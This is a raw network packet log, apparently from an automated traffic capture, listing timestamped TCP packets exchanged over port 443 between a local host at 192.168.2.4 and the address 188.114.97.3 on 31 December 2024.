                                                                                              Dec 31, 2024 08:57:16.044533968 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.046145916 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.046159983 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.046246052 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.046251059 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.068690062 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.068707943 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.068738937 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.068748951 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.068825960 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.077269077 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.077281952 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.077358961 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.077358961 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.077363968 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.077816963 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.077842951 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.077867985 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.077878952 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.077897072 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.080338001 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.080351114 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.080399036 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.080406904 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.121155024 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.121172905 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.121217966 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.121227980 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.121334076 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.129542112 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.129554033 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.129650116 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.129650116 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.129656076 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.131145954 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.131165028 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.131200075 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.131205082 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.131241083 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.132944107 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.132957935 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.133035898 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.133042097 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.155426979 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.155447006 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.155494928 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.155500889 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.155514956 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.163995981 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.164011002 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.164069891 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.164076090 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.164108038 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.164583921 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.164602041 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.164670944 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.164670944 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.164676905 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.174273014 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.174287081 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.174340963 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.174346924 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.208116055 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.208136082 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.208164930 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.208170891 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.208209991 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.216387987 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.216402054 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.216434002 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.216440916 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.216510057 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.217988968 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.218007088 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.218044996 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.218050957 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.218065023 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.219753981 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.219768047 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.219829082 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.219834089 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.242237091 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.242255926 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.242297888 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.242304087 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.242332935 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.250817060 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.250829935 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.250863075 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.250871897 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.250900984 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.251494884 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.251512051 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.251555920 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.251560926 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.251571894 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.254013062 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.254028082 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.254085064 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.254085064 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.254092932 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.294883013 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.294915915 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.294962883 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.294967890 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.294972897 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.303149939 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.303163052 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.303219080 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.303225040 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.304688931 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.304704905 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.304739952 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.304744959 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.304763079 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.306407928 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.306425095 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.306448936 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.306453943 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.306514978 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.329166889 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.329185009 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.329215050 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.329222918 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.329255104 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.337609053 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.337621927 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.337675095 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.337680101 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.338160992 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.338176966 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.338207960 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.338212013 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.338272095 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.340836048 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.340850115 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.340913057 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.340917110 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.381680965 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.381704092 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.381751060 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.381758928 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.381824017 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.389950037 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.389967918 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.390037060 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.390043020 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.390074968 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.391381979 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.391398907 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.391452074 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.391458988 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.391535044 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.393312931 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.393326998 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.393393993 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.393400908 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.415971994 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.415990114 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.416095018 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.416095018 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.416102886 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.424432039 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.424444914 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.424496889 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.424501896 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.425052881 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.425069094 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.425110102 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.425113916 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.425234079 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.427601099 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.427630901 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.427649021 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.427656889 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.427696943 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.468518019 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.468533993 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.468591928 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.468600988 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.468626976 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.476830006 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.476844072 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.476872921 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.476886034 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.476931095 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.478208065 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.478226900 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.478255987 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.478271008 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.478298903 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.480089903 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.480103970 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.480168104 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.480168104 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.480176926 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.502753973 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.502772093 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.502849102 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.502856970 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.502876043 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.511389971 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.511403084 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.511456013 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.511465073 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.511840105 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.511861086 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.511938095 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.511938095 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.511944056 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.514504910 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.514530897 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.514564037 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.514568090 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.514600039 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.555334091 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.555351019 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.555393934 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.555401087 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.555442095 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.563694000 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.563709974 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.563756943 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.563761950 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.565176964 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.565195084 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.565222979 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.565228939 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.565273046 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.589132071 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.589155912 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.589221001 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.589221954 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.589229107 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.617985964 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.618021011 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.618073940 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.618073940 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.618087053 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.618123055 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.618618011 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.618629932 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.618685961 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.618690968 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.618750095 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.619121075 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.619133949 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.619182110 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.619187117 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.619254112 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.619625092 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.619640112 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.619700909 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.619707108 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.619777918 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.650087118 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.650101900 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.650166035 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.650171995 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.650211096 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.650625944 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.650639057 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.650669098 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.650674105 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.650696993 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.650814056 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.651932001 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.651946068 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.651989937 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.651993990 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.652064085 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.680088043 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.680102110 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.680150032 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.680154085 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.680233002 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.704865932 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.704883099 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.704961061 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.704967976 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.705446959 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.705465078 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.705507994 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.705513954 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.705573082 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.705898046 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.705910921 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.705950022 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.705956936 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.706299067 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.706316948 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.706341028 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.706346989 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.706367970 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.706454039 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.736944914 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.736962080 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.737030029 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.737034082 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.737078905 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.737413883 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.737427950 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.737462044 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.737466097 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.737498999 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.737545967 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.738732100 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.738759995 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.738814116 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.738818884 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.738846064 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.738858938 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.762926102 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.762944937 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.763120890 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.763128042 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.763200045 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.791781902 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.791796923 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.791862965 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.791874886 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.792112112 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.792299032 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.792314053 CET44349735188.114.97.3192.168.2.4
                                                                                              Dec 31, 2024 08:57:16.792371988 CET49735443192.168.2.4188.114.97.3
                                                                                              Dec 31, 2024 08:57:16.792376041 CET44349735188.114.97.3192.168.2.4
